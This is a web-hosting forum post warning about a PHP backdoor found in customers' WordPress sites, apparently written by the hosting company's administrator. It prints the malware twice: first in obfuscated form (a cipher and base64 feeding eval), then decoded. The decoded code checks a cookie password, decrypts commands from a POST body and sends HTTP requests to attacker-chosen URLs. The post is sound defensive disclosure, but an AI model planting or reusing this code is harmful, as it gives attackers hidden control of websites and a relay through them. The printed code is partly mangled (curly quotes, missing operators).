Author Topic: WordPress Backdoor PHP code  (Read 9561 times)

Offline Scott Anderson

  • Administrator
  • Newbie
  • *****
  • Posts: 5
  • Country: us
  • Karma: +0/-0
WordPress Backdoor PHP code
« on: April 27, 2016, 04:08:19 PM »
We have detected a Backdoor PHP code in many of our clients website . It is often hidden in the WP writable directory. This backdoor is used to send PHP code execution.

Code: [Select]
<?php
$yeqqdvu 
6110;
function 
neceliemyz($rdcldpm$oqwvlr)
{
$efogjgyh ;
for(
$i=0$i strlen($rdcldpm); $i++){
$efogjgyh .= isset($oqwvlr[$rdcldpm[$i]]) ? $oqwvlr[$rdcldpm[$i]] : $rdcldpm[$i];
}
$pgdnvjl=”base64_decode”;
return 
$pgdnvjl($efogjgyh);
}
$hljnyoyp ‘KevoH68qlUKamupXVJy4IUvPlUmxdJmqmxttM04Zg9yXdcvPVu63MgG4duGPlUmxdJmqm’.
‘xttM04Zg9yvVsmSVv8xlUySVspXdcVarg97RKXNVu63UJpXdk6Pdev2HUKa’.
‘rg97RKXNHkGodJmvUJ6qlUmPIkmSVsKarO97RKXNHkWXUJZvGgAsdkwYUu6YlkZFGevSdv83HkFvmxttM04ZgA3Mlc8’.
‘xlkwhHgNamw8R038BOjjAIUrAmev3lk3XRKX7RKaADgNAHkIAMgpXGe62DgQ8DgDtI0wcrqIxrx3uIqDqB0p5ler2IhvbzO3’.
‘xZkjtlRrWrcl5l0V5MK3MDgNADgNADgyvLev3Mg97RKX8RKaZg5p9IUpbDR3Alcv4l68slUpPIu8oGe6oGiramJya’.
‘VRaSBuvoVi63mx97RKa9lew3ION8DiZtdev3MgD8D5t9lew3IOtxM04ZgA3MmeDuZw89lkZSle6Plew3’.
‘ION8DembVujuZw89lkZSlejaGUm4le6hdupvMgp9IUpbkqwGMO97RKaZg5pqlkW9UupbGeQAfOyFdsZvVcvbdevTlOb9lkZxL’.
‘Uy3Mgp5ZhpPle6hdupvUupbGeQXM04ZgA3MmimvVJ64GgN8DiZvdcpPle’.
‘w3I0QAMgpqlkW9UupbGeQXzt3MRKXXl5NaDOpxlUZFdiKXRKX7RKaADgNAmimvVJ64GgN8DiZvdcpPlew3I0DamiZvd’.
‘cpPlew3IO97RKX8RKaZgc6hHeCAmimvVJ64GR4ZgA3Mls6oIJpXduYAle6hVsvtGgA9lew3IO9Z’.
‘gs4Zg5NADgN9dJ63UupbGeQAfON5Dh4Zg5NADgN9Hu6WDR3Amw80p6mkp6’.
‘mdm3bj6wyPOQ806gGGDgYAmw80p6mkp6mdmFmwj66wjFpP66mmmF37RKaADgN’.
‘Ame2vL684lkYAfOyqGim4lkYame2vLO97RKaARKaADgNAlc8xDgA9H03tzxN9H’.
‘ONCDiZ3Vcnvd5A9Hu6WM04Ame91Mx9Zg5NADgy7RKaADgNADgNADgp1lUvdmevGDR3AIubxMe8xlgA9’.
‘Hu6WkxpXUO9AU5Name2vL684lkYAmONxZ0jXM04Zg5NADgy8RKaZg5NADgycdJDAMgpXf0N7Dg’.
‘pXfiZ3Vcnvd5A9lew3IO97MK3MDgNADi4Zg5NADgNADgNAlc8xDgA9Hh3tzxN9HhnqGim4lkYame2vLO9Am5IAme9CVJpxde6’.
‘oMgp9IUpbM04Amea1MxtAme91Mx9Zg5NADgNADgNALt3MDgNADgNADgNADgNAme8FGw89I’.
‘UpbDgY8DeZaV5bSVcKamepbGewdmevGMOyLDe8xlgA9Hu6WkxpEUO9Xzt3MDgNADgNADgy8RKaADgNAPK3MRKaADg’.
‘NAVc63GUmoDgpSGUpPlew3I04Zgs3ZgA3Mls6oIJpXduYAVu6olw89IUpbrOA9lew3IO9Zgs4Zg5NADgN9He6blgN8DgD5z’.
‘t3MRKaADgNAlc8xlkwhHgA9lew3I645He6ble6xVxmGDewqDgp1lU98f5puIknFlO9Zg5NADgy7RKaADgNADgNADgpa’.
‘lkw9DgY8Dgp1lU9AB5N5z5N5DgYAmilbdi6vDgYADvnxUeY5zt3MDgNADi3ZgA3MDgNAD’.
‘gptIUmbdUrAfOybVsmbLOAsHip3VgVAf0YAIUmxIU9aRKaADgNADgNADgG2lUpaduKsDR3+Dgp9IUpb’.
‘kxm2lUpaduK5UOtZg5NADgNADgNAmubvIkpvV5VAf0YAmebvIkK4RKaADgNADgNADgGh’.
‘duW3lkW3mxN8f5N9lew3I645Ic89LOmGBN3MDgNADgNADgNsGev2lk8FGgVAf0YAmepbGewdDspXdk6SG’.
‘UK5UOtZg5NADgNADgNARKaADgNAMO97RKaZg5NADgN9IJpYDR3AVJpxlkw2UuZSdspvLipPIJmvIUp’.
‘vMgptIUmbdUrXzt3MDgNADN3MDgNADgpxlUZFdiKAfOyNlcv4l68slUpPIu8oGe’.
‘6oGiramepbGewdDs6xdgmGBgyeKjn0pOtAmeZ3Lg97RKaZg5NADgyXl5Nameb3Giy’.
‘PVc6qVe8oVu6PHe6ble6xMK3MDgNADi4Zg5NADgNADgNAHkIAMiZ3VsySVxA9’.
‘Hip3Vw8xlUZtduWql68alkw9lUmdrw34DgDxrRN5MON8f03Ap9wrj3jXRKaADgNADgNADi4Zg5NADgNADgNADgNADgpxlU’.
‘ZFdiKAfON5Owpjjw8wjvmfjvn3D5NoDgpaGiptUJmvVJySdsZvUubvIkpvVv4tU04Zg5’.
‘NADgNADgNAPK3MDgNADi3Zg5NADgyvdiZvRKaADgNALt3MDgNADgNADgN9Vc6qGkn3DR3AD9Zf09WwKFpm03WPp6mO0’.
‘FD5zt3MDgNADi3ZgA3MDgNADimvGi6xd5N9Vc6qGkn3zt3MPK3MRKXcGkWhGevSd5yqlkW9UupbGeQxMgp9IUpb’.
‘MK3MLt3MDgNADgCSDi6qlOyqduZ1lUpqRKX8’;
$budjtact = Array(‘1’=>’r’‘0’=>’T’‘3’=>’0&#8242;, ‘2’=>’t’, ‘5’=>’i’, ‘4’=>’s’, ‘7’=>’7&#8242;, ‘6’=>’V’, ‘9’=>’k’, ‘8’=>’9&#8242;, ‘A’=>’g’, ‘C’=>’8’, ‘B’=>’L’, ‘E’=>’q’, ‘D’=>’I’, ‘G’=>’d’, ‘F’=>’1’, ‘I’=>’Y’, ‘H’=>’a’, ‘K’=>’Q’, ‘J’=>’3’, ‘M’=>’K’, ‘L’=>’e’, ‘O’=>’S’, ‘N’=>’A’, ‘Q’=>’E’, ‘P’=>’f’, ‘S’=>’v’, ‘R’=>’D’, ‘U’=>’X’, ‘T’=>’6’, ‘W’=>’5’, ‘V’=>’c’, ‘Y’=>’4’, ‘X’=>’p’, ‘Z’=>’N’, ‘a’=>’o’, ‘c’=>’m’, ‘b’=>’h’, ‘e’=>’G’, ‘d’=>’b’, ‘g’=>’C’, ‘f’=>’P’, ‘i’=>’H’, ‘h’=>’j’, ‘k’=>’W’, ‘j’=>’U’, ‘m’=>’J’, ‘l’=>’Z’, ‘o’=>’u’, ‘n’=>’x’, ‘q’=>’z’, ‘p’=>’R’, ‘s’=>’n’, ‘r’=>’M’, ‘u’=>’2’, ‘t’=>’w’, ‘w’=>’F’, ‘v’=>’l’, ‘y’=>’B’, ‘x’=>’y’, ‘z’=>’O’);
eval/*oynngj*/(neceliemyz($hljnyoyp$budjtact));

?>

We have decoded the code into PHP version

Code: [Select]
<?php

@ini_set(‘display_errors’,0);
@
ini_set(‘log_errors’,0);
@
error_reporting(0);
@
set_time_limit(0);
@
ignore_user_abort(1);
@
ini_set(‘max_execution_time’,0);

foreach (
$_COOKIE as $item)
{
if (
$item != “0a1f3623-6c23-4bdc-b9a9-25e0d392fbe7”)
exit();
}

$data file_get_contents(‘php://input’);
$data split(=,$data,2);

$b64_decode_data base64_decode(urldecode($data[1]));

$send_data unserialize(decrypt($b64_decode_data));

$result send_data1 ($send_data);

if (!
$result)
{
$result send_data2($send_data);
}

echo 
$result;

function 
decrypt($data)
{
$out_data “”;
$key $_SERVER[‘HTTP_HOST’] . $_SERVER[‘REQUEST_URI’];
$key_len strlen($key);

for (
$i=0$i strlen($key); $i++)
{
$key[$i] = chr(ord($key[$i]) ^ ($key_len 255));
}

for (
$i=0$i<strlen($data);)
{
for (
$j=0$j<strlen($key) && $i<strlen($data); $j++, $i++)
{
$out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
}
}

return 
$out_data;
}

function 
send_data1($data)
{
$head “”;

foreach(
$data[“headers”] as $key=>$value)
{
$head .= $key ” $value \r\n”;
}

$params = array(‘http’ => array(
‘method’ => $data[“method”],
‘header’ => $head,
‘content’ => $data[“body”],
‘timeout’ => $data[“timeout”],

));

$ctx stream_context_create($params);

$result = @file_get_contents($data[“url”], FALSE$ctx);

if (
$http_response_header)
{
if (
strpos($http_response_header[0], “200”) === FALSE)
{
$result “HTTP_ERROR\t” $http_response_header[0];
}
}
else
{
$result “CONNECTION_ERROR”;
}

return 
$result;
}

function 
send_data2($data)
{
// use sockets
}

Its always recommended to use Themes and Plugins from good vendors to avoid this issues .

Thanks,
Scott
Hostripples - Affordable web hosting
https://hostripples.com
https://hostripples.in
https://hostripples.co.uk
Hostripples.com $1 Unlimited Hosting